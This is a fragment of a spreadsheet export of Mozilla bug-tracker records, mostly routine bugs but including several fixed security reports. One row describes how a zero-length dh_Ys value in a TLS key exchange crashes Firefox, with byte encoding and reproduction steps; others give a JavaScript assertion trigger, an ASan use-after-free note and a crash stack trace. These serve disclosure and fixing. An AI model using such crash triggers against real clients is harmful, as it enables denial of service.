      <c r="F3180" t="n">
        <v>1</v>
      </c>
      <c r="G3180" t="n">
        <v>3</v>
      </c>
      <c r="H3180" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3180" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3180" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3180" t="inlineStr">
        <is>
          <t>3.11</t>
        </is>
      </c>
      <c r="L3180" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3180" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3180" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3180" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3180" t="inlineStr">
        <is>
          <t>[sg:dos] sg:moderate or sg:low for weak key issue? (connecting to stupid servers)</t>
        </is>
      </c>
      <c r="Q3180" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3180" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3180" t="inlineStr">
        <is>
          <t>3.12.7</t>
        </is>
      </c>
      <c r="T3180" t="n">
        <v>1</v>
      </c>
      <c r="U3180" t="n">
        <v>0</v>
      </c>
      <c r="V3180" t="n">
        <v>15</v>
      </c>
      <c r="W3180" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
When using DHE cipher suites, a correctly crafted server key exchange message will crash Firefox.
       struct {
           opaque dh_p&lt;1..2^16-1&gt;;
           opaque dh_g&lt;1..2^16-1&gt;;
           opaque dh_Ys&lt;1..2^16-1&gt;;
       } ServerDHParams;     /* Ephemeral DH parameters */
dh_p can be zero length, dh_g can be zero length - but when dh_Ys is zero length; Firefox crashes.
example encoding:
00 00 00 00 00 00
Signature on key is validated first - so easiest done by Evil TLS Server(TM).
Reproducible: Always
Steps to Reproduce:
Modify TLS server to send a 0 length dh_Ys.
Actual Results:  
On linux - firefox vanishes.
On windows - crash report application comes up.
Expected Results:  
Rejection of invalid dh params.
Some similar bad parameters are caught with errors about memory allocation failure.</t>
        </is>
      </c>
      <c r="X3180" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3181">
      <c r="A3181" t="n">
        <v>263285</v>
      </c>
      <c r="B3181" t="inlineStr">
        <is>
          <t>2004-10-07 01:11:29 -0700</t>
        </is>
      </c>
      <c r="C3181" t="inlineStr">
        <is>
          <t>crash changing minimum font size [@ js_GetGCThingFlags]</t>
        </is>
      </c>
      <c r="D3181" t="inlineStr">
        <is>
          <t>2004-11-13 00:22:12 -0800</t>
        </is>
      </c>
      <c r="E3181" t="n">
        <v>1</v>
      </c>
      <c r="F3181" t="n">
        <v>1</v>
      </c>
      <c r="G3181" t="n">
        <v>3</v>
      </c>
      <c r="H3181" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3181" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3181" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3181" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3181" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3181" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3181" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3181" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3181" t="inlineStr"/>
      <c r="Q3181" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3181" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3181" t="inlineStr">
        <is>
          <t>mozilla1.8alpha5</t>
        </is>
      </c>
      <c r="T3181" t="n">
        <v>1</v>
      </c>
      <c r="U3181" t="n">
        <v>0</v>
      </c>
      <c r="V3181" t="n">
        <v>15</v>
      </c>
      <c r="W3181" t="inlineStr">
        <is>
          <t>If I change the minimum font size in the preferences menu, Mozilla (usually)
crashes when I hit OK.  I'll attach a stack, which has js_GetGCThingFlags at the
top, similar to bug 237081 comment 3.
This (and the crash at people.aol.com) regressed between linux trunk builds
2004100405 and 2004100506.  The only thing I see in that window that could cause
this looks like bug 246441.</t>
        </is>
      </c>
      <c r="X3181" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3182">
      <c r="A3182" t="n">
        <v>222218</v>
      </c>
      <c r="B3182" t="inlineStr">
        <is>
          <t>2003-10-15 00:36:11 -0700</t>
        </is>
      </c>
      <c r="C3182" t="inlineStr">
        <is>
          <t>XHTML as text/html in website update...</t>
        </is>
      </c>
      <c r="D3182" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E3182" t="n">
        <v>1</v>
      </c>
      <c r="F3182" t="n">
        <v>1</v>
      </c>
      <c r="G3182" t="n">
        <v>5</v>
      </c>
      <c r="H3182" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3182" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J3182" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3182" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3182" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3182" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3182" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3182" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3182" t="inlineStr"/>
      <c r="Q3182" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3182" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3182" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3182" t="n">
        <v>1</v>
      </c>
      <c r="U3182" t="n">
        <v>0</v>
      </c>
      <c r="V3182" t="n">
        <v>9</v>
      </c>
      <c r="W3182" t="inlineStr">
        <is>
          <t>from dbaron e-mail....
The web page should not be sending XHTML as text/html.  The DOCTYPE
declaration should instead specify HTML 4.01.  (fantasai says she sent
rebron email saying this, but that rebron has ignored her email about
the new web page.)  See http://www.hixie.ch/advocacy/xhtml for the
reasons for this.</t>
        </is>
      </c>
      <c r="X3182" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3183">
      <c r="A3183" t="n">
        <v>831474</v>
      </c>
      <c r="B3183" t="inlineStr">
        <is>
          <t>2013-01-16 13:36:13 -0800</t>
        </is>
      </c>
      <c r="C3183" t="inlineStr">
        <is>
          <t>Update revision of Jetpack tests used in Firefox tests once bug 825471 lands</t>
        </is>
      </c>
      <c r="D3183" t="inlineStr">
        <is>
          <t>2013-02-11 03:10:18 -0800</t>
        </is>
      </c>
      <c r="E3183" t="n">
        <v>1</v>
      </c>
      <c r="F3183" t="n">
        <v>1</v>
      </c>
      <c r="G3183" t="n">
        <v>6</v>
      </c>
      <c r="H3183" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3183" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J3183" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3183" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3183" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3183" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3183" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3183" t="inlineStr">
        <is>
          <t>[leave open]</t>
        </is>
      </c>
      <c r="Q3183" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3183" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3183" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3183" t="n">
        <v>1</v>
      </c>
      <c r="U3183" t="n">
        <v>0</v>
      </c>
      <c r="V3183" t="n">
        <v>12</v>
      </c>
      <c r="W3183" t="inlineStr">
        <is>
          <t>Once the pull request in bug 825471 lands, we need to update the jetpack revision used in mozilla-central's tests to get them testing the new stuff, and to green up the tree a bit.</t>
        </is>
      </c>
      <c r="X3183" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3184">
      <c r="A3184" t="n">
        <v>602115</v>
      </c>
      <c r="B3184" t="inlineStr">
        <is>
          <t>2010-10-05 17:53:38 -0700</t>
        </is>
      </c>
      <c r="C3184" t="inlineStr">
        <is>
          <t>Crash [@ txExecutionState::popTemplateRule]</t>
        </is>
      </c>
      <c r="D3184" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:51 -0700</t>
        </is>
      </c>
      <c r="E3184" t="n">
        <v>1</v>
      </c>
      <c r="F3184" t="n">
        <v>1</v>
      </c>
      <c r="G3184" t="n">
        <v>3</v>
      </c>
      <c r="H3184" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3184" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3184" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K3184" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3184" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3184" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3184" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3184" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3184" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3184" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3184" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3184" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3184" t="n">
        <v>1</v>
      </c>
      <c r="U3184" t="n">
        <v>0</v>
      </c>
      <c r="V3184" t="n">
        <v>22</v>
      </c>
      <c r="W3184" t="inlineStr">
        <is>
          <t>Created attachment 481111
testcase (crashes Firefox when loaded)</t>
        </is>
      </c>
      <c r="X3184" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3185">
      <c r="A3185" t="n">
        <v>750820</v>
      </c>
      <c r="B3185" t="inlineStr">
        <is>
          <t>2012-05-01 11:19:24 -0700</t>
        </is>
      </c>
      <c r="C3185" t="inlineStr">
        <is>
          <t>Use-after-free in nsGlobalWindow::PageHidden</t>
        </is>
      </c>
      <c r="D3185" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3185" t="n">
        <v>1</v>
      </c>
      <c r="F3185" t="n">
        <v>1</v>
      </c>
      <c r="G3185" t="n">
        <v>3</v>
      </c>
      <c r="H3185" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3185" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3185" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3185" t="inlineStr">
        <is>
          <t>14 Branch</t>
        </is>
      </c>
      <c r="L3185" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3185" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3185" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3185" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3185" t="inlineStr">
        <is>
          <t>[asan][qa-][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3185" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3185" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3185" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T3185" t="n">
        <v>1</v>
      </c>
      <c r="U3185" t="n">
        <v>0</v>
      </c>
      <c r="V3185" t="n">
        <v>31</v>
      </c>
      <c r="W3185" t="inlineStr">
        <is>
          <t>Created attachment 619997
ASan log
Heap-use-after-free caught on Firefox 14.0a1, ASan log attached. Unfortunately no PoC at the moment - will try to catch it again.</t>
        </is>
      </c>
      <c r="X3185" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3186">
      <c r="A3186" t="n">
        <v>889193</v>
      </c>
      <c r="B3186" t="inlineStr">
        <is>
          <t>2013-07-01 20:17:51 -0700</t>
        </is>
      </c>
      <c r="C3186" t="inlineStr">
        <is>
          <t>Assertion failure: !aGCThing after setting expando property on a DOMCursor</t>
        </is>
      </c>
      <c r="D3186" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3186" t="n">
        <v>1</v>
      </c>
      <c r="F3186" t="n">
        <v>1</v>
      </c>
      <c r="G3186" t="n">
        <v>3</v>
      </c>
      <c r="H3186" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3186" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3186" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3186" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3186" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3186" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3186" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3186" t="inlineStr">
        <is>
          <t>[adv-main24+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q3186" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3186" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3186" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3186" t="n">
        <v>1</v>
      </c>
      <c r="U3186" t="n">
        <v>0</v>
      </c>
      <c r="V3186" t="n">
        <v>50</v>
      </c>
      <c r="W3186" t="inlineStr">
        <is>
          <t>var req = mozContacts.getAll({});
req.blabla = function() {};
req is a DOMCursor.
Assertion failure: !aGCThing, at /xpcom/base/CycleCollectedJSRuntime.cpp:831</t>
        </is>
      </c>
      <c r="X3186" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3187">
      <c r="A3187" t="n">
        <v>1372372</v>
      </c>
      <c r="B3187" t="inlineStr">
        <is>
          <t>2017-06-12 14:05:27 -0700</t>
        </is>
      </c>
      <c r="C3187" t="inlineStr">
        <is>
          <t>Capitalize all user initials in revision list</t>
        </is>
      </c>
      <c r="D3187" t="inlineStr">
        <is>
          <t>2017-06-27 19:09:13 -0700</t>
        </is>
      </c>
      <c r="E3187" t="n">
        <v>1</v>
      </c>
      <c r="F3187" t="n">
        <v>1</v>
      </c>
      <c r="G3187" t="n">
        <v>7</v>
      </c>
      <c r="H3187" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3187" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3187" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3187" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3187" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3187" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3187" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3187" t="inlineStr"/>
      <c r="Q3187" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R3187" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S3187" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3187" t="n">
        <v>1</v>
      </c>
      <c r="U3187" t="n">
        <v>0</v>
      </c>
      <c r="V3187" t="n">
        <v>7</v>
      </c>
      <c r="W3187" t="inlineStr">
        <is>
          <t>Some user initials in push revision history could be better parsed, for example:
sotaro.ikeda.g@gmail.com registered their user name as just 'sotaro', with no last name. This results in a single lowercase 's' in the revision user push initials, which is smaller and more difficult to read than a typical 'AB' two cap characters for most other users.
So perhaps we can capitalize all leading characters in the userTokens name string when we're building the revisions.</t>
        </is>
      </c>
      <c r="X3187" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3188">
      <c r="A3188" t="n">
        <v>780549</v>
      </c>
      <c r="B3188" t="inlineStr">
        <is>
          <t>2012-08-05 21:05:19 -0700</t>
        </is>
      </c>
      <c r="C3188" t="inlineStr">
        <is>
          <t>crash access violation mozjs!js::types::AutoEnterCompilation::~AutoEnterCompilation</t>
        </is>
      </c>
      <c r="D3188" t="inlineStr">
        <is>
          <t>2013-11-25 13:20:22 -0800</t>
        </is>
      </c>
      <c r="E3188" t="n">
        <v>1</v>
      </c>
      <c r="F3188" t="n">
        <v>1</v>
      </c>
      <c r="G3188" t="n">
        <v>3</v>
      </c>
      <c r="H3188" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3188" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3188" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3188" t="inlineStr">
        <is>
          <t>17 Branch</t>
        </is>
      </c>
      <c r="L3188" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3188" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3188" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3188" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3188" t="inlineStr">
        <is>
          <t>[has stacktrace][qa-][adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q3188" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3188" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3188" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T3188" t="n">
        <v>1</v>
      </c>
      <c r="U3188" t="n">
        <v>0</v>
      </c>
      <c r="V3188" t="n">
        <v>44</v>
      </c>
      <c r="W3188" t="inlineStr">
        <is>
          <t>Created attachment 649172
windbg stacktrace
+++ This bug was initially created as a clone of Bug #743221 +++
perhaps related to bug 743221 - unclear as yet. captured by windbg. Having trouble recalling steps at the moment.
(74e0.d44): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=2238525c ebx=2866c000 ecx=22385000 edx=0749df00 esi=7eb00000 edi=002c8370
eip=678d1eaa esp=002c8358 ebp=002c8378 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for C:\Program Files\Mozilla.org\FF 17.0a1 2012-08-02\mozjs.dll
mozjs!js::types::AutoEnterCompilation::~AutoEnterCompilation+0x1a:
678d1eaa 8b0e            mov     ecx,dword ptr [esi]  ds:0023:7eb00000=????????
0:000&gt; ~* kp;!analyze -f;lm
.  0  Id: 74e0.d44 Suspend: 1 Teb: 7ffdf000 Unfrozen
ChildEBP RetAddr  
002c835c 678ebf04 mozjs!js::types::AutoEnterCompilation::~AutoEnterCompilation(void)+0x1a [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\jsinferinlines.h @ 286]
002c8378 678ec0fa mozjs!js::mjit::Compiler::performCompilation(void)+0x94 [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\methodjit\compiler.cpp @ 510]
002c8388 678ec45f mozjs!js::mjit::Compiler::compile(void)+0xa [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\methodjit\compiler.cpp @ 112]
002cc4a0 67848f99 mozjs!js::mjit::CanMethodJIT(struct JSContext * cx = 0x146a3de0, struct JSScript * script = 0x2866c028, unsigned char * pc = 0x17d25c44 "&gt;W", bool construct = false, js::mjit::CompileRequest request = CompileRequest_Interpreter (0n0), class js::StackFrame * frame = 0x04de01b0)+0x2af [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\methodjit\compiler.cpp @ 998]
002ccd9c 67851d70 mozjs!js::Interpret(struct JSContext * cx = 0x146a3de0, class js::StackFrame * entryFrame = 0x04de0068, js::InterpMode interpMode = JSINTERP_NORMAL (0n0))+0xf49 [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\jsinterp.cpp @ 2446]
002cce10 678523fa mozjs!js::InvokeKernel(struct JSContext * cx = 0x146a3de0, class JS::CallArgs args = class JS::CallArgs, js::MaybeConstruct construct = NO_CONSTRUCT (0n0))+0x610 [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\jsinterp.cpp @ 356]
002cce58 67872ea1 mozjs!js::Invoke(struct JSContext * cx = 0x146a3de0, class JS::Value * thisv = 0x002cce80, class JS::Value * fval = 0x002cce9c, unsigned int argc = 0, class JS::Value * argv = 0x00000000, class JS::Value * rval = 0x002ccee0)+0x1ba [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\jsinterp.cpp @ 388]
*** WARNING: Unable to verify checksum for C:\Program Files\Mozilla.org\FF 17.0a1 2012-08-02\xul.dll
002cce8c 59a6035a mozjs!JS_CallFunctionValue(struct JSContext * cx = 0x146a3de0, struct JSObject * objArg = 0x1fb55040, class JS::Value fval = class JS::Value, unsigned int argc = 0, class JS::Value * argv = 0x00000000, class JS::Value * rval = 0x002ccee0)+0x41 [e:\builds\moz2_slave\m-cen-w32-ntly\build\js\src\jsapi.cpp @ 5836]
002cd030 59a31f3b xul!nsJSContext::CallEventHandler(class nsISupports * aTarget = 0x1c08cc40, struct JSObject * aScope = 0x1fb55040, struct JSObject * aHandler = 0x286a6960, class nsIArray * aargv = 0x1859b9e0, class nsIVariant ** arv = 0x002cd080)+0x47a [e:\builds\moz2_slave\m-cen-w32-ntly\build\dom\base\nsjsenvironment.cpp @ 1929]
002cd08c 59a3a428 xul!nsGlobalWindow::RunTimeoutHandler(struct nsTimeout * aTimeout = 0x2238525c, class nsIScriptContext * aScx = 0x1747c8d0)+0xeb [e:\builds\moz2_slave\m-cen-w32-ntly\build\dom\base\nsglobalwindow.cpp @ 9555]
002cd118 59b7bacc xul!nsGlobalWindow::RunTimeout(struct nsTimeout * aTimeout = 0x185d1ce0)+0x1e8 [e:\builds\moz2_slave\m-cen-w32-ntly\build\dom\base\nsglobalwindow.cpp @ 9806]
002cd130 59a73a54 xul!nsGlobalWindow::TimerCallback(class nsITimer * aTimer = 0x185d26d0, void * aClosure = 0x185d1ce0)+0x1b [e:\builds\moz2_slave\m-cen-w32-ntly\build\dom\base\nsglobalwindow.cpp @ 10072]
002cd160 59aa6960 xul!nsTimerImpl::Fire(void)+0xf4 [e:\builds\moz2_slave\m-cen-w32-ntly\build\xpcom\threads\nstimerimpl.cpp @ 473]
002cd1d0 59a6e6d9 xul!nsThread::ProcessNextEvent(bool mayWait = false, bool * resu</t>
        </is>
      </c>
      <c r="X3188" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3189">
      <c r="A3189" t="n">
        <v>1351446</v>
      </c>
      <c r="B3189" t="inlineStr">
        <is>
          <t>2017-03-28 12:55:47 -0700</t>
        </is>
      </c>
      <c r="C3189" t="inlineStr">
        <is>
          <t>LeanPlum Phase I Integration</t>
        </is>
      </c>
      <c r="D3189" t="inlineStr">
        <is>
          <t>2017-08-15 09:53:06 -0700</t>
        </is>
      </c>
      <c r="E3189" t="n">
        <v>1</v>
      </c>
      <c r="F3189" t="n">
        <v>1</v>
      </c>
      <c r="G3189" t="n">
        <v>2</v>
      </c>
      <c r="H3189" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3189" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3189" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K3189" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3189" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3189" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3189" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3189" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3189" t="inlineStr">
        <is>
          <t>[MMA] [MobileCore]</t>
        </is>
      </c>
      <c r="Q3189" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3189" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3189" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3189" t="n">
        <v>1</v>
      </c>
      <c r="U3189" t="n">
        <v>0</v>
      </c>
      <c r="V3189" t="n">
        <v>1</v>
      </c>
      <c r="W3189" t="inlineStr">
        <is>
          <t>https://docs.google.com/document/d/1VODMs1FIK8NpxpbeUFZDX7LXDI2pQ6wYASkJ0lIc_qk/edit</t>
        </is>
      </c>
      <c r="X3189" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3190">
      <c r="A3190" t="n">
        <v>1399846</v>
      </c>
      <c r="B3190" t="inlineStr">
        <is>
          <t>2017-09-14 06:01:52 -0700</t>
        </is>
      </c>
      <c r="C3190" t="inlineStr">
        <is>
          <t>New Tab - Watermark logo hover state should not show message bubble</t>
        </is>
      </c>
      <c r="D3190" t="inlineStr">
        <is>
          <t>2017-10-13 07:20:02 -0700</t>
        </is>
      </c>
      <c r="E3190" t="n">
        <v>1</v>
      </c>
      <c r="F3190" t="n">
        <v>1</v>
      </c>
      <c r="G3190" t="n">
        <v>2</v>
      </c>
      <c r="H3190" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3190" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3190" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K3190" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3190" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3190" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3190" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3190" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3190" t="inlineStr">
        <is>
          <t>[photon-onboarding][photon-onboarding-newui]</t>
        </is>
      </c>
      <c r="Q3190" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3190" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3190" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3190" t="n">
        <v>1</v>
      </c>
      <c r="U3190" t="n">
        <v>0</v>
      </c>
      <c r="V3190" t="n">
        <v>9</v>
      </c>
      <c r="W3190" t="inlineStr">
        <is>
          <t>When the watermark version of the Firefox logo is on new tab, hovering over the logo should only show the colorized version - not the notification bubble.
Spec (see Onboarding Tour Completed): https://mozilla.invisionapp.com/share/KFD2GYHWM#/248971014_New_Tab_-_Onboarding</t>
        </is>
      </c>
      <c r="X3190" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3191">
      <c r="A3191" t="n">
        <v>1093757</v>
      </c>
      <c r="B3191" t="inlineStr">
        <is>
          <t>2014-11-04 11:12:04 -0800</t>
        </is>
      </c>
      <c r="C3191" t="inlineStr">
        <is>
          <t>Install a RabbitMQ monitoring plugin for New Relic on stage and prod</t>
        </is>
      </c>
      <c r="D3191" t="inlineStr">
        <is>
          <t>2015-03-11 04:21:54 -0700</t>
        </is>
      </c>
      <c r="E3191" t="n">
        <v>1</v>
      </c>
      <c r="F3191" t="n">
        <v>1</v>
      </c>
      <c r="G3191" t="n">
        <v>7</v>
      </c>
      <c r="H3191" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3191" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3191" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3191" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3191" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
